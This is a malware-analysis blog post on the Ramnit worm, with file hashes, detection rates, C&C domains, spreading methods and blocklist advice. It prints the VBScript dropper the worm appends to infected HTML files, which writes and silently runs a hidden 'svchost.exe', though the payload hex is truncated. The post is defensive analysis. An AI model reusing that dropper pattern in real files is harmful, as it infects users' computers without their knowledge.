Recently I came across a malware sample which have made some suspicious network activity to a domain called zahlung.name. The domain name looks very suspicious (German word for “payment”) so I decided to take a closer look at the sample.
*** Worm W32.Ramnit ***
Let’s take a quick look at the behavior of Ramnit. The Worm always installs itself into the same directory using the same filename:
In this case the file has a very bad AV detection rate:
File size: 51’200 bytes
VT Result: 3 /43 (7.0%)
After the Worm infected the computer, it starts iexplore.exe in a invisible mode and injects itself into the process. In this way the Worm is able to bypass the local Firewall and communicate with it’s Command&Control Server (C&C).
As soon as the computer is infected, the Worm starts to spread itself by infecting all files on the victim’s computer which have the file extension EXE, DLL or HTML. For example, if Quick Time Player is installed on the victim’s computer the Worm will automatically search thru the directory and infecting the EXE, DLL and HTML files. Below is a screenshort of a clean systems (before the infection):
Followed by a screenshot of a infected system (same directory):
Note that the file size and date modified of the infected files has changed. The same goes for other directories with EXE, DLL or HTML files for example the Adobe Reader directory (before the infection):
And after infection:
Let’s compare the original (clean) files with the infected files which has been patched by Worm Ramnit:
* MD5: 6df76965a0fb8237e9c3b3cab9815ec2
* File size: 413’696 bytes
* VT result: 0/41 (0.0%)
* MD5: c32b6f477c5454d4e2cded81e686036d
* File size: 466’944 bytes
* VT result: 38/42 (90.5%)
*** AGM.dll (Adobe Reader) ***
* MD5: 8f0b2030b5e42235c855a94a17f57118
* File size: 4’883’456 bytes
* VT result: 0/41 (0.0%)
* MD5: 833c79d662f8cc47579540dc03505419
* File size: 4’936’192 bytes
* VT result: 39/43 (90.7%)
As shown on Virustotal, the files which have been infected by the Worm are pretty good detected by most of the AV engines.
If we take a closer look into a infected HTML file we will see that the Worm has added a VB-Script at the end of the file:
DropFileName = "svchost.exe"
WriteData = "4D5A900003000000[...]"
Set FSO = CreateObject("Scripting.FileSystemObject")
DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName
If FSO.FileExists(DropPath)=False Then
Set FileObj = FSO.CreateTextFile(DropPath, True)
For i = 1 To Len(WriteData) Step 2
FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2)))
Set WSHshell = CreateObject("WScript.Shell")
WSHshell.Run DropPath, 0
If a user runs the HTML file, the VB-Script will drop a file called “svchost.exe” and infect the computer.
*** C&C Communication ***
The Worm is using it’s own proprietary protocol to communicate with the C&C server on port 443 (which is normally HTTPs). Since August 2010 I’ve seen three different domain names which are being used by Worm Ramnit:
- zahlung.name (Firstseen on 2010-10-01)
- glavdmn.com (Firstseen on 2010-09-16)
- fget-career.com (Firstseen on 2010-09-03)
I’ve Google for all three domain names and I haven’t found any evidence which would show that these domain names are malicious. But of course they are. Unfortunately, if we lookup those domain names on URLVoid it won’t look better:
- www.urlvoid.com/scan/zahlung.name [Detection: 1/17 (6 %)]
- www.urlvoid.com/scan/glavdmn.com [Detection: 1/17 (6 %)]
- www.urlvoid.com/scan/fget-career.com [Detection: 1/17 (6 %)]
It’s a pretty good example that sometimes the AV industry fails.
*** How the Worm spread itself ***
Worm Ramnit uses several ways to spread itself and infect other computers:
- Drive-By exploits
- Infecting EXE, DLL and HTML files on the victims computer
- Infecting removable medium including USB Stick, USB Harddrives and CDs
*** Conclusion ***
Due to the fact, that the Worm installs itself always as “DesktopLayer.exe”, it shouldn’t be to hard to identify infected systems. If you Google for “DesktopLayer.exe” you will see over 30’000 hits including users who complaining about the file “DesktopLayer.exe” which they just found on their computer. So it looks like the Worm is already pretty wide spreaded.
As already mentioned before, the Worm has various methods how he can spread itself. Mainly worms are a big problem for large networks (like coperate or governmental networks): If you have one infected computer the Worm will spread quickly within your network by infecting removable drivers or files one networks shares.
The mentioned C&C domain names which are associated with Worm Ramnit are already listed on AMaDa. Therefore you can use the AMaDa C&C Domain Blocklist to block C&C traffic or identify infected systems in your network.